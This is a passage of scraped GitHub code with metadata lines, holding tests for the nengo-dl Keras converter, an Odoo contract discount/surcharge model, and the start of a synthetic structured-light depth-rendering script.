max_to_avg_pool=True, inference_only=True\n )\n\n keras_params = 0\n for layer in model.layers:\n if not isinstance(\n layer, (compat.BatchNormalizationV1, compat.BatchNormalizationV2)\n ):\n for w in layer._trainable_weights:\n keras_params += np.prod(w.shape)\n\n # note: we don't expect any of the verification checks to pass, due to the\n # max_to_avg_pool swap, so just checking that the network structure has been\n # recreated\n with conv.net:\n # undo the inference_only=True so that parameters will be marked as\n # trainable (so that the check below will work)\n config.configure_settings(inference_only=False)\n\n with Simulator(conv.net) as sim:\n assert keras_params == sum(\n np.prod(w.shape) for w in sim.keras_model.trainable_weights\n )\n\n\ndef test_nested_network(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.layers.Input(shape=(4,))\n x = tf.keras.layers.Dense(units=10)(x)\n\n sub_sub_inp = tf.keras.Input(shape=(10, 1, 1))\n sub_sub_out = tf.keras.layers.Flatten()(sub_sub_inp)\n sub_sub_model = tf.keras.Model(sub_sub_inp, sub_sub_out, name=\"subsubmodel\")\n\n sub_inp0 = tf.keras.Input(shape=(10, 1))\n sub_inp1 = tf.keras.Input(shape=(10, 1))\n sub_add = tf.keras.layers.Add()([sub_inp0, sub_inp1])\n sub_out0 = tf.keras.layers.Reshape((10,))(sub_add)\n sub_out1 = tf.keras.layers.Reshape((10, 1, 1))(sub_add)\n sub_out1 = sub_sub_model(sub_out1)\n sub_model = tf.keras.Model(\n [sub_inp0, sub_inp1], [sub_out0, sub_out1], name=\"submodel\"\n )\n\n x = sub_model([x, x])\n x = sub_model(x)\n\n _test_convert(inp, x)\n\n\ndef test_repeated_layers(seed):\n inp = x = tf.keras.layers.Input(shape=(4,))\n layer = tf.keras.layers.Dense(units=4)\n x = layer(x)\n x = layer(x)\n x = layer(x)\n\n model = tf.keras.Model(inputs=inp, outputs=x)\n\n conv = converter.Converter(model, allow_fallback=False, split_shared_weights=True)\n\n assert conv.verify(training=False)\n with pytest.raises(ValueError, match=\"number of trainable parameters\"):\n # we don't expect the verification to pass for training=True, since we\n # split up the shared weights in the nengo network\n conv.verify(training=True)\n\n # error if split_shared_weights=False\n with pytest.raises(\n ValueError, match=\"not supported unless split_shared_weights=True\"\n ):\n converter.Converter(model, split_shared_weights=False)\n\n\ndef test_fan_in_out():\n a = tf.keras.layers.Input(shape=(1,))\n b = tf.keras.layers.Reshape((1, 1))\n c = tf.keras.layers.Reshape((1, 1, 1))\n d = tf.keras.layers.Reshape((1, 1, 1))\n\n x = d(a)\n y = d(x)\n z = d(y)\n\n outputs = [b(a), c(a), d(a), x, y, z]\n\n _test_convert(a, outputs)\n\n\ndef test_sequential(seed):\n tf.random.set_seed(seed)\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Dense(32, input_shape=(4,)))\n model.add(tf.keras.layers.Dense(32))\n\n conv = converter.Converter(model, allow_fallback=False)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\n@pytest.mark.parametrize(\n \"keras_activation, nengo_activation, swap\",\n [\n (tf.nn.sigmoid, nengo.RectifiedLinear(), {tf.nn.sigmoid: tf.nn.relu}),\n (\n tf.nn.relu,\n nengo.SpikingRectifiedLinear(),\n {tf.nn.relu: nengo.SpikingRectifiedLinear()},\n ),\n (tf.nn.relu, nengo.LIF(), {nengo.RectifiedLinear(): nengo.LIF()}),\n ],\n)\ndef test_activation_swap(\n Simulator, keras_activation, nengo_activation, swap, rng, seed\n):\n inp = x = tf.keras.Input(shape=(100,))\n x = tf.keras.layers.Activation(activation=keras_activation)(x)\n x = tf.keras.layers.Dense(\n units=100,\n activation=keras_activation,\n kernel_initializer=tf.initializers.constant(np.eye(100)),\n )(x)\n model = tf.keras.Model(inp, x)\n\n conv = converter.Converter(model, allow_fallback=False, swap_activations=swap)\n\n with nengo.Network() as net:\n net.config[nengo.Ensemble].neuron_type = nengo_activation\n net.config[nengo.Ensemble].gain = nengo.dists.Choice([1])\n net.config[nengo.Ensemble].bias = nengo.dists.Choice([0])\n net.config[nengo.Connection].synapse = None\n\n inp = nengo.Node(np.zeros(100))\n ens0 = nengo.Ensemble(100, 1)\n nengo.Connection(inp, ens0.neurons)\n\n ens1 = nengo.Ensemble(100, 1)\n nengo.Connection(ens0.neurons, ens1.neurons)\n\n p = nengo.Probe(ens1.neurons)\n\n inp_vals = rng.uniform(size=(20, 50, 100))\n\n # set the seed so that initial voltages will be the same\n net.seed = seed\n conv.net.seed = seed\n\n with Simulator(net) as sim0:\n data0 = sim0.predict(inp_vals)\n\n with Simulator(conv.net) as sim1:\n data1 = sim1.predict(inp_vals)\n\n assert np.allclose(data0[p], data1[conv.outputs[model.outputs[0]]])\n\n\ndef test_max_pool(rng):\n inp = x = tf.keras.Input(shape=(4, 4, 2))\n x = tf.keras.layers.MaxPool2D()(x)\n\n model = tf.keras.Model(inp, x)\n\n with pytest.warns(UserWarning, match=\"consider setting max_to_avg_pool=True\"):\n conv = converter.Converter(model, max_to_avg_pool=False)\n\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n # can convert to avg pool, but then we don't expect output to match\n conv = converter.Converter(model, max_to_avg_pool=True, allow_fallback=False)\n with pytest.raises(ValueError, match=\"does not match output\"):\n conv.verify(training=False, inputs=[rng.uniform(size=(2, 4, 4, 2))])\n\n\ndef test_unsupported_args():\n inp = x = tf.keras.Input(shape=(4, 1))\n x = tf.keras.layers.Conv1D(1, 1, kernel_regularizer=tf.keras.regularizers.l1(0.1))(\n x\n )\n\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(\n TypeError,\n match=\"kernel_regularizer has value .* != None.*unless inference_only=True\",\n ):\n converter.Converter(model, allow_fallback=False)\n\n with pytest.warns(\n UserWarning,\n match=\"kernel_regularizer has value .* != None.*unless inference_only=True\",\n ):\n conv = converter.Converter(model, allow_fallback=True)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n inp = x = tf.keras.Input(shape=(4, 1))\n x = tf.keras.layers.Conv1D(1, 1, dilation_rate=(2,))(x)\n\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(TypeError, match=r\"dilation_rate has value \\(2,\\) != \\(1,\\)\"):\n converter.Converter(model, allow_fallback=False)\n\n with pytest.warns(UserWarning, match=r\"dilation_rate has value \\(2,\\) != \\(1,\\)\"):\n conv = converter.Converter(model, allow_fallback=True)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\ndef test_custom_converter():\n class AddOne(tf.keras.layers.Layer):\n def call(self, inputs):\n return inputs + 1\n\n @converter.Converter.register(AddOne)\n class ConvertAddOne(converter.LayerConverter):\n def convert(self, node_id):\n output = self.add_nengo_obj(node_id)\n self.add_connection(node_id, output)\n\n bias = nengo.Node([1] * output.size_in)\n conn = nengo.Connection(bias, output, synapse=None)\n self.set_trainable(conn, False)\n\n return output\n\n inp = x = tf.keras.Input(shape=(2, 2))\n x = AddOne()(x)\n\n _test_convert(inp, x)\n\n with pytest.warns(UserWarning, match=\"already has a converter\"):\n converter.Converter.register(AddOne)(ConvertAddOne)\n\n\ndef test_input():\n inp = x = tf.keras.Input(shape=(None, None, 2))\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(ValueError, match=\"must be fully specified\"):\n converter.Converter(model)\n\n\ndef test_nested_input():\n subinputs = (\n tf.keras.Input(shape=(2,), name=\"sub0\"),\n tf.keras.Input(shape=(2,), name=\"sub1\"),\n )\n x_0 = x = tf.keras.layers.Activation(tf.nn.relu)(subinputs[0])\n x = tf.keras.layers.Concatenate()([x, subinputs[1]])\n submodel = tf.keras.Model(subinputs, (x_0, x))\n\n inputs = (\n tf.keras.Input(shape=(2,), name=\"in0\"),\n tf.keras.Input(shape=(2,), name=\"in1\"),\n )\n x_0, x = submodel(inputs)\n x = tf.keras.layers.Concatenate()([x, x_0])\n\n _test_convert(inputs, x)\n\n\ndef test_leaky_relu(rng):\n inp = x = tf.keras.Input(shape=(4,))\n x = tf.keras.layers.ReLU(negative_slope=0.1)(x)\n x = tf.keras.layers.LeakyReLU(alpha=2)(x)\n\n _test_convert(inp, x, inp_vals=[rng.uniform(-1, 1, size=(32, 4))])\n\n\n@pytest.mark.parametrize(\n \"Layer, size, data_format\",\n [\n (tf.keras.layers.UpSampling1D, 3, None),\n (tf.keras.layers.UpSampling2D, (2, 2), \"channels_last\"),\n (tf.keras.layers.UpSampling2D, (3, 3), \"channels_first\"),\n (tf.keras.layers.UpSampling3D, (2, 3, 4), \"channels_first\"),\n ],\n)\ndef test_upsampling(Layer, size, data_format, rng):\n input_shape = (4,) * (len(size) if isinstance(size, tuple) else 1)\n if data_format is None or data_format == \"channels_last\":\n input_shape += (2,)\n else:\n input_shape = (2,) + input_shape\n inp = x = tf.keras.Input(shape=input_shape, batch_size=3)\n x = Layer(\n size=size, **({} if data_format is None else {\"data_format\": data_format})\n )(x)\n\n _test_convert(\n inp, x, inp_vals=[np.arange(np.prod(inp.get_shape())).reshape(inp.shape)]\n )\n\n\ndef test_scale_firing_rates():\n inp = tf.keras.Input(shape=(1,))\n x = tf.keras.layers.ReLU()(inp)\n model = tf.keras.Model(inp, x)\n\n # scaling doesn't affect output at all for non-spiking neurons\n conv = converter.Converter(model, scale_firing_rates=5)\n assert conv.verify()\n\n # works with existing amplitude values\n neuron_type = nengo.RectifiedLinear(amplitude=2)\n conv = converter.Converter(\n model,\n scale_firing_rates=5,\n swap_activations={nengo.RectifiedLinear(): neuron_type},\n )\n assert neuron_type.amplitude == 2\n assert conv.net.ensembles[0].neuron_type.amplitude == 2 / 5\n\n # warning when applying scaling to non-amplitude neuron type\n inp = tf.keras.Input(shape=(1,))\n x = tf.keras.layers.Activation(tf.nn.sigmoid)(inp)\n model = tf.keras.Model(inp, x)\n\n with pytest.warns(UserWarning, match=\"does not support amplitude\"):\n conv = converter.Converter(model, scale_firing_rates=5)\n\n with pytest.raises(ValueError, match=\"does not match output\"):\n conv.verify()\n\n\n@pytest.mark.parametrize(\n \"scale_firing_rates, expected_rates\",\n [(5, [5, 5]), ({1: 3, 2: 4}, [3, 4]), ({2: 3}, [1, 3])],\n)\ndef test_scale_firing_rates_cases(Simulator, scale_firing_rates, expected_rates):\n input_val = 100\n bias_val = 50\n n_steps = 100\n\n inp = tf.keras.Input(shape=(1,))\n x0 = tf.keras.layers.ReLU()(inp)\n x1 = tf.keras.layers.Dense(\n units=1,\n activation=tf.nn.relu,\n kernel_initializer=tf.initializers.constant([[1]]),\n bias_initializer=tf.initializers.constant([[bias_val]]),\n )(inp)\n model = tf.keras.Model(inp, [x0, x1])\n\n # convert indices to layers\n scale_firing_rates = (\n {model.layers[k]: v for k, v in scale_firing_rates.items()}\n if isinstance(scale_firing_rates, dict)\n else scale_firing_rates\n )\n\n conv = converter.Converter(\n model,\n swap_activations={tf.nn.relu: nengo.SpikingRectifiedLinear()},\n scale_firing_rates=scale_firing_rates,\n )\n\n with Simulator(conv.net) as sim:\n sim.run_steps(\n n_steps, data={conv.inputs[inp]: np.ones((1, n_steps, 1)) * input_val}\n )\n\n for i, p in enumerate(conv.net.probes):\n # spike heights are scaled down\n assert np.allclose(np.max(sim.data[p]), 1 / sim.dt / expected_rates[i])\n\n # number of spikes is scaled up\n assert np.allclose(\n np.count_nonzero(sim.data[p]),\n (input_val if i == 0 else input_val + bias_val)\n * expected_rates[i]\n * n_steps\n * sim.dt,\n atol=1,\n )\n\n\ndef test_layer_dicts():\n inp0 = tf.keras.Input(shape=(1,))\n inp1 = tf.keras.Input(shape=(1,))\n add = tf.keras.layers.Add()([inp0, inp1])\n dense_node = tf.keras.layers.Dense(units=1)(add)\n dense_ens = tf.keras.layers.Dense(units=1, activation=tf.nn.relu)(dense_node)\n\n model = tf.keras.Model([inp0, inp1], [dense_node, dense_ens])\n\n conv = converter.Converter(model)\n assert len(conv.inputs) == 2\n assert len(conv.outputs) == 2\n assert len(conv.layers) == 5\n\n # inputs/outputs/layers referencing the same stuff\n assert isinstance(conv.outputs[dense_node], nengo.Probe)\n assert conv.outputs[dense_node].target is conv.layers[dense_node]\n assert conv.inputs[inp0] is conv.layers[inp0]\n\n # look up by tensor\n assert isinstance(conv.layers[dense_node], nengo.Node)\n assert isinstance(conv.layers[dense_ens], nengo.ensemble.Neurons)\n\n # look up by layer\n assert isinstance(conv.layers[model.layers[-2]], nengo.Node)\n assert isinstance(conv.layers[model.layers[-1]], nengo.ensemble.Neurons)\n\n # iterating over dict works as expected\n for i, key in enumerate(conv.layers):\n assert model.layers.index(key[0]._wrapped._keras_history.layer) == i\n\n # applying the same layer multiple times\n inp = tf.keras.Input(shape=(1,))\n layer = tf.keras.layers.ReLU()\n x0 = layer(inp)\n x1 = layer(inp)\n\n model = tf.keras.Model(inp, [x0, x1])\n\n conv = converter.Converter(model, split_shared_weights=True)\n\n with pytest.raises(KeyError, match=\"has been called multiple times\"):\n assert conv.layers[layer]\n\n assert conv.outputs[x0].target is conv.layers[x0]\n assert conv.outputs[x1].target is conv.layers[x1]\n\n\ndef test_mid_model_output():\n \"\"\"\n Check that converter supports output tensors from the middle of the model.\n\n Previous converter put output tensors last in build order, so having an\n output tensor that needed to be built before non-output tensors was\n problematic. https://github.com/nengo/nengo-dl/pull/137\n \"\"\"\n\n # model must have at least three layers, with one layer in between outputs\n inp = tf.keras.Input(shape=(1,))\n x0 = tf.keras.layers.ReLU()(inp)\n x1 = tf.keras.layers.ReLU()(x0)\n x2 = tf.keras.layers.ReLU()(x1)\n\n _test_convert(inp, [x0, x2], inp_vals=[np.ones((4, 1))])\n\n\ndef test_synapse():\n inp = tf.keras.Input(shape=(1,))\n dense0 = tf.keras.layers.Dense(units=10, activation=tf.nn.relu)(inp)\n dense1 = tf.keras.layers.Dense(units=10, activation=None)(dense0)\n\n model = tf.keras.Model(inp, [dense0, dense1])\n\n conv = converter.Converter(model, synapse=0.1)\n\n for conn in conv.net.all_connections:\n if conn.pre is conv.layers[dense0]:\n # synapse set on outputs from neurons\n assert conn.synapse == nengo.Lowpass(0.1)\n else:\n # synapse not set on other connections\n assert conn.synapse is None\n\n # synapse set on neuron probe\n assert conv.outputs[dense0].synapse == nengo.Lowpass(0.1)\n # not set on non-neuron probe\n assert conv.outputs[dense1].synapse is None\n\n\ndef test_dense_fallback_bias():\n def relu(x):\n return tf.maximum(x, 0)\n\n inp = tf.keras.Input((1,))\n out = tf.keras.layers.Dense(units=10, activation=relu)(inp)\n\n _test_convert(inp, out, allow_fallback=True)\n\n # double check that extra biases aren't added when we _are_ using an Ensemble\n conv = converter.Converter(\n tf.keras.Model(inp, out),\n allow_fallback=False,\n swap_activations={relu: nengo.RectifiedLinear()},\n )\n assert conv.verify(training=True)\n\n\ndef test_swap_activations_key_never_used():\n \"\"\"Ensure warnings are thrown properly when there is an unused swap activations\n key.\"\"\"\n\n def relu(x):\n return tf.maximum(x, 0)\n\n def relu2(x):\n return tf.maximum(x, 0)\n\n inp = tf.keras.Input((1,))\n out = tf.keras.layers.Dense(units=10, activation=relu)(inp)\n\n # Test that swap_activations are throwing warnings when not used\n with pytest.warns(UserWarning, match=\"no layers in the model with that activation\"):\n conv = converter.Converter(\n tf.keras.Model(inp, out),\n allow_fallback=False,\n swap_activations={\n relu: nengo.RectifiedLinear(),\n relu2: nengo.RectifiedLinear(),\n },\n )\n assert conv.swap_activations.unused_keys() == {relu2}\n\n # Test that there is no warning if all keys are used\n inp = tf.keras.Input((1,))\n out = tf.keras.layers.Dense(units=10, activation=relu)(inp)\n out = tf.keras.layers.Dense(units=10, activation=relu2)(out)\n with pytest.warns(None) as recwarns:\n conv = converter.Converter(\n tf.keras.Model(inp, out),\n allow_fallback=False,\n swap_activations={\n relu: nengo.RectifiedLinear(),\n relu2: nengo.RectifiedLinear(),\n nengo.RectifiedLinear(): nengo.SpikingRectifiedLinear(),\n },\n )\n assert not any(\n \"no layers in the model with that activation\" in w.message for w in recwarns\n )\n assert len(conv.swap_activations.unused_keys()) == 0\n\n # check swap_activations dict functions\n assert len(conv.swap_activations) == 3\n assert set(conv.swap_activations.keys()) == {relu, relu2, nengo.RectifiedLinear()}\n\n\n@pytest.mark.skipif(\n version.parse(nengo.__version__) <= version.parse(\"3.0.0\"),\n reason=\"Nengo 3.1 required to convert SpikingActivation layers\",\n)\ndef test_spiking_activation(Simulator, seed, rng, pytestconfig):\n keras_spiking = pytest.importorskip(\"keras_spiking\")\n\n inp_val = rng.uniform(0, 2, size=(1, 100, 10))\n\n inp = x = tf.keras.Input((None, 10))\n x = tf.keras.layers.Dense(units=10)(x)\n x = keras_spiking.SpikingActivation(\n \"relu\", seed=seed, spiking_aware_training=False\n )(x)\n\n # note: it will not match for batch_size > 1, because keras-spiking generates\n # a different initial state for each batch element, which is not possible in nengo\n model = tf.keras.Model(inp, x)\n conv = converter.Converter(model, temporal_model=True)\n assert conv.verify(training=False, inputs=[inp_val])\n assert conv.verify(training=True, inputs=[inp_val])\n\n # check non-default dt\n inp = x = tf.keras.Input((None, 10))\n x = keras_spiking.SpikingActivation(\"relu\", dt=1, seed=seed)(x)\n model = tf.keras.Model(inp, x)\n keras_out = model.predict(inp_val)\n\n with pytest.warns(UserWarning, match=\"dt will be controlled by Simulator\"):\n conv = converter.Converter(model, inference_only=True, temporal_model=True)\n\n with Simulator(conv.net, dt=1) as sim:\n nengo_out = sim.predict(inp_val)\n\n assert np.allclose(keras_out, nengo_out[conv.outputs[x]])\n\n # check statefulness\n inp = x = tf.keras.Input((None, 10), batch_size=1)\n x = keras_spiking.SpikingActivation(\"relu\", dt=1, seed=seed, stateful=True)(x)\n model = tf.keras.Model(inp, x)\n\n with pytest.warns(\n UserWarning, match=\"statefulness will be controlled by Simulator\"\n ):\n conv = converter.Converter(model, inference_only=True, temporal_model=True)\n\n if version.parse(tf.__version__) >= version.parse(\"2.4.0rc0\"):\n # TensorFlow bug prevents this from working prior to 2.4, see\n # https://github.com/tensorflow/tensorflow/issues/42193\n keras_out0 = model.predict(inp_val)\n keras_out1 = model.predict(inp_val)\n\n with Simulator(conv.net, dt=1) as sim:\n nengo_out0 = sim.predict(inp_val, stateful=True)\n nengo_out1 = sim.predict(inp_val, stateful=True)\n\n assert not np.allclose(keras_out0, keras_out1)\n assert np.allclose(keras_out0, nengo_out0[conv.outputs[x]])\n assert np.allclose(keras_out1, nengo_out1[conv.outputs[x]])\n\n # error if wrapped activation is not supported\n inp = tf.keras.Input((None, 10))\n x = keras_spiking.SpikingActivation(\"elu\")(inp)\n model = tf.keras.Model(inp, x)\n with pytest.raises(TypeError, match=\"does not have a native Nengo equivalent\"):\n converter.Converter(model, temporal_model=True, inference_only=True)\n\n # does not support fallbacks\n inp = tf.keras.Input((None, 10))\n x = keras_spiking.SpikingActivation(\"relu\", spiking_aware_training=True)(inp)\n model = tf.keras.Model(inp, x)\n with pytest.raises(\n TypeError, match=\"spiking_aware_training has value True != False\"\n ):\n converter.Converter(model, temporal_model=True, allow_fallback=True)\n\n\ndef test_spiking_activation_old_nengo():\n keras_spiking = pytest.importorskip(\"keras_spiking\")\n\n inp = x = tf.keras.Input((None, 10), batch_size=1)\n x = keras_spiking.SpikingActivation(\"relu\")(x)\n model = tf.keras.Model(inp, x)\n\n ctx = (\n pytest.raises(TypeError, match=\"requires Nengo>=3.1.0\")\n if version.parse(nengo.__version__) <= version.parse(\"3.0.0\")\n else contextlib.suppress()\n )\n\n with ctx:\n converter.Converter(\n model, allow_fallback=False, temporal_model=True, inference_only=True\n )\n\n\n@pytest.mark.parametrize(\"tau, dt\", [(0.01, 0.001), (0.013, 0.003)])\n@pytest.mark.parametrize(\"Layer\", (compat.Lowpass, compat.Alpha))\ndef test_lowpass_alpha(Layer, tau, dt, Simulator, rng):\n pytest.importorskip(\"keras_spiking\")\n\n inp = x = tf.keras.Input((None, 10))\n x = tf.keras.layers.Dense(units=10)(x)\n x = Layer(tau_initializer=tau, dt=dt, trainable=False)(x)\n\n model = tf.keras.Model(inp, x)\n\n with (\n pytest.warns(Warning, match=\"dt will be controlled by Simulator.dt\")\n if dt != 0.001\n else contextlib.suppress()\n ):\n conv = converter.Converter(model, temporal_model=True, allow_fallback=False)\n\n inp_vals = rng.uniform(0, 2, size=(8, 50, 10))\n\n with Simulator(conv.net, dt=dt, minibatch_size=8) as sim:\n model_out = model.predict(inp_vals)\n nengo_out = sim.predict(inp_vals)\n\n # nengo model is off by one timestep due to the synaptic delay\n assert np.allclose(\n model_out[:, :-1], nengo_out[conv.outputs[x]][:, 1:], atol=5e-6\n )\n\n # check training\n # Training works, but is not identical due to the different dynamics introduced\n # by the one-timestep delay.\n out_vals = nengo.Lowpass(tau).filt(inp_vals, axis=1)\n\n model.compile(optimizer=tf.optimizers.SGD(0.1), loss=tf.losses.mse)\n model_log = model.fit(inp_vals, out_vals, epochs=3)\n\n sim.compile(optimizer=tf.optimizers.SGD(0.1), loss=tf.losses.mse)\n nengo_log = sim.fit(inp_vals, out_vals, epochs=3)\n\n assert np.allclose(\n nengo_log.history[\"loss\"][-1],\n model_log.history[\"loss\"][-1],\n rtol=0.05,\n atol=0.01,\n )\n\n model_out = model.predict(inp_vals)\n nengo_out = sim.predict(inp_vals)\n assert np.allclose(\n model_out[:, :-1], nengo_out[conv.outputs[x]][:, 1:], rtol=0.03, atol=0.03\n )\n\n # can't convert trainable layers\n inp = tf.keras.Input((None, 10))\n layer = Layer(tau_initializer=0.1, trainable=True)\n model = tf.keras.Model(inp, layer(inp))\n with pytest.raises(TypeError, match=\"layer.trainable=False\"):\n converter.Converter(model, temporal_model=True)\n\n # can't convert layers with non-zero initial level\n layer.trainable = False\n tf.keras.backend.set_value(\n layer.layer.cell.initial_level, np.ones(layer.layer.cell.initial_level.shape)\n )\n model = tf.keras.Model(inp, layer(inp))\n with pytest.raises(TypeError, match=\"initial_level != 0\"):\n converter.Converter(model, temporal_model=True)\n\n # can't convert layers with individual taus\n tf.keras.backend.set_value(\n layer.layer.cell.initial_level, np.zeros(layer.layer.cell.initial_level.shape)\n )\n tf.keras.backend.set_value(\n layer.layer.cell.tau, np.arange(10).reshape(layer.layer.cell.tau.shape)\n )\n model = tf.keras.Model(inp, layer(inp))\n with pytest.raises(TypeError, match=\"different tau values\"):\n converter.Converter(model, temporal_model=True)\n\n\n@pytest.mark.parametrize(\"timesteps\", [10, None])\ndef test_time_distributed(timesteps):\n inp = x = tf.keras.Input((timesteps, 8))\n x = tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(units=16))(x)\n x = tf.keras.layers.TimeDistributed(tf.keras.layers.Reshape((4, 4, 1)))(x)\n x = tf.keras.layers.TimeDistributed(\n tf.keras.layers.Conv2D(filters=2, kernel_size=3)\n )(x)\n\n _test_convert(inp, x, temporal_model=True)\n\n with (\n pytest.raises(ValueError, match=\"Input.*fully specified.*temporal_model=True\")\n if timesteps is None\n else pytest.raises(TypeError, match=\"only be converted when temporal_model=Tru\")\n ):\n converter.Converter(tf.keras.Model(inp, x), temporal_model=False)\n","repo_name":"nengo/nengo-dl","sub_path":"nengo_dl/tests/test_converter.py","file_name":"test_converter.py","file_ext":"py","file_size_in_byte":35371,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"29"} +{"seq_id":"35544342460","text":"# -*- coding: utf-8 -*-\nfrom openerp import api\nfrom openerp import fields\nfrom openerp import models\n\n\nclass Account_analytic_account_inherited(models.Model):\n _inherit = 'account.analytic.account' \n \n acrescimo_desconto = fields.One2many(\n comodel_name='acrescimo_desconto',\n inverse_name='contrato',\n string='Acréscimos/Descontos',\n help='Acréscimos e descontos recorrentes associadas ao contrato')\n\n\nclass Acrescimo_desconto(models.Model):\n \"\"\"\n Classe para registro de acréscimos e descontos futuros no contrato.\n \"\"\"\n\n _name = 'acrescimo_desconto'\n _inherit = ['mail.thread', 'ir.needaction_mixin']\n\n name = fields.Selection(\n selection=[('acres', 'Acréscimo'),\n ('desc', 'Desconto')],\n string='Tipo',\n required=True,\n track_visibility='onchange')\n\n active = fields.Boolean(\n string=\"Ativo\",\n track_visibility='onchange'\n )\n\n observacoes = fields.Text(\n string=\"Observações\",\n track_visibility='onchange'\n )\n\n valor = fields.Float(\n string=\"Valor\",\n required=True,\n track_visibility='onchange'\n )\n\n repeticoes = fields.Integer(\n string=\"Repetições\",\n track_visibility='onchange'\n )\n\n repeticoes_executadas = fields.Integer(\n string=\"Repetições Executadas\",\n track_visibility='onchange'\n )\n\n contrato = fields.Many2one(\n string=\"Contrato\",\n comodel_name='account.analytic.account',\n required=True,\n track_visibility='onchange')\n\n","repo_name":"Guobower/outbox_odoo","sub_path":"boleto_registrado/models/account_analytic_account_inherited.py","file_name":"account_analytic_account_inherited.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40477955791","text":"import argparse\n\nimport numpy as np\nimport pickle\nfrom pathlib import Path\nimport time\nimport json\nimport cv2\nimport collections\nimport sys\nimport h5py\nimport os\n\nsys.path.append('../')\nimport co\nfrom data_manipulation import get_rotation_matrix, read_pattern_file, post_process\n\nconfig_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', 'config.json'))\nwith open(config_path) as fp:\n config = json.load(fp)\n CTD_path = Path(config['CTD_DIR'])\n sys.path.append(str(CTD_path / 'data'))\n sys.path.append(str(CTD_path / 'renderer'))\n\nfrom lcn import lcn\nfrom cyrender import PyRenderInput, PyCamera, PyShader, PyRenderer\n\ndef get_objs(shapenet_dir, obj_classes, num_perclass=100):\n shapenet = {'chair': '03001627',\n 'airplane': '02691156',\n 'car': '02958343',\n 'watercraft': '04530566'}\n\n obj_paths = []\n for cls in obj_classes:\n if cls not in shapenet.keys():\n raise Exception('unknown class name')\n ids = shapenet[cls]\n obj_path = sorted(Path(f'{shapenet_dir}/{ids}').glob('**/models/*.obj'))\n obj_paths += obj_path[:num_perclass]\n print(f'found {len(obj_paths)} object paths')\n\n objs = []\n for obj_path in obj_paths:\n print(f'load {obj_path}')\n v, f, _, n = co.io3d.read_obj(obj_path)\n diffs = v.max(axis=0) - v.min(axis=0)\n v /= (0.5 * diffs.max())\n v -= (v.min(axis=0) + 1)\n f = f.astype(np.int32)\n objs.append((v, f, n))\n print(f'loaded {len(objs)} objects')\n\n return objs\n\n\ndef get_mesh(rng, min_z=0):\n # set up background board\n verts, faces, normals, colors = [], [], [], []\n v, f, n = co.geometry.xyplane(z=0, interleaved=True)\n v[:, 2] += -v[:, 2].min() + rng.uniform(3, 5)\n v[:, :2] *= 5e2\n v[:, 2] = np.mean(v[:, 2]) + (v[:, 2] - np.mean(v[:, 2])) * 5e2\n c = np.empty_like(v)\n c[:] = rng.uniform(0, 1, size=(3,)).astype(np.float32)\n verts.append(v)\n faces.append(f)\n normals.append(n)\n colors.append(c)\n\n # randomly sample 4 foreground objects for each scene\n for shape_idx in range(4):\n v, f, n = objs[rng.randint(0, len(objs))]\n v, f, n = v.copy(), f.copy(), n.copy()\n\n s = rng.uniform(0.25, 1)\n v *= s\n R = co.geometry.rotm_from_quat(co.geometry.quat_random(rng=rng))\n v = v @ R.T\n n = n @ R.T\n v[:, 2] += -v[:, 2].min() + min_z + rng.uniform(0.5, 3)\n v[:, :2] += rng.uniform(-1, 1, size=(1, 2))\n\n c = np.empty_like(v)\n c[:] = rng.uniform(0, 1, size=(3,)).astype(np.float32)\n\n verts.append(v.astype(np.float32))\n faces.append(f)\n normals.append(n)\n colors.append(c)\n\n verts, faces = co.geometry.stack_mesh(verts, faces)\n normals = np.vstack(normals).astype(np.float32)\n colors = np.vstack(colors).astype(np.float32)\n return verts, faces, colors, normals\n\n\ndef create_data(pattern_type, out_root, idx, n_samples, imsize_proj, imsize, pattern, K_proj, K, K_processed, baseline, blend_im, noise,\n track_length=4):\n tic = time.time()\n rng = np.random.RandomState()\n\n rng.seed(idx)\n\n verts, faces, colors, normals = get_mesh(rng)\n data = PyRenderInput(verts=verts.copy(), colors=colors.copy(), normals=normals.copy(), faces=faces.copy())\n print(f'loading mesh for sample {idx + 1}/{n_samples} took {time.time() - tic}[s]')\n\n # let the camera point to the center\n center = np.array([0, 0, 3], dtype=np.float32)\n\n basevec = np.array([-baseline, 0, 0], dtype=np.float32)\n unit = np.array([0, 0, 1], dtype=np.float32)\n\n cam_x_ = rng.uniform(-0.2, 0.2)\n cam_y_ = rng.uniform(-0.2, 0.2)\n cam_z_ = rng.uniform(-0.2, 0.2)\n\n ret = collections.defaultdict(list)\n blend_im_rnd = np.clip(blend_im + rng.uniform(-0.1, 0.1), 0, 1)\n\n # capture the same static scene from different view points as a track\n for ind in range(track_length):\n\n cam_x = cam_x_ + rng.uniform(-0.1, 0.1)\n cam_y = cam_y_ + rng.uniform(-0.1, 0.1)\n cam_z = cam_z_ + rng.uniform(-0.1, 0.1)\n\n tcam = np.array([cam_x, cam_y, cam_z], dtype=np.float32)\n\n if np.linalg.norm(tcam[0:2]) < 1e-9:\n Rcam = np.eye(3, dtype=np.float32)\n else:\n Rcam = get_rotation_matrix(center, center - tcam)\n\n tproj = tcam + basevec\n Rproj = Rcam\n\n ret['R'].append(Rcam)\n ret['t'].append(tcam)\n\n fx_proj = K_proj[0, 0]\n fy_proj = K_proj[1, 1]\n px_proj = K_proj[0, 2]\n py_proj = K_proj[1, 2]\n im_height_proj = imsize_proj[0]\n im_width_proj = imsize_proj[1]\n proj = PyCamera(fx_proj, fy_proj, px_proj, py_proj, Rproj, tproj, im_width_proj, im_height_proj)\n\n fx = K[0, 0]\n fy = K[1, 1]\n px = K[0, 2]\n py = K[1, 2]\n im_height = imsize[0]\n im_width = imsize[1]\n cam = PyCamera(fx, fy, px, py, Rcam, tcam, im_width, im_height)\n\n shader = PyShader(0.5, 1.5, 0.0, 10)\n pyrenderer = PyRenderer(cam, shader, 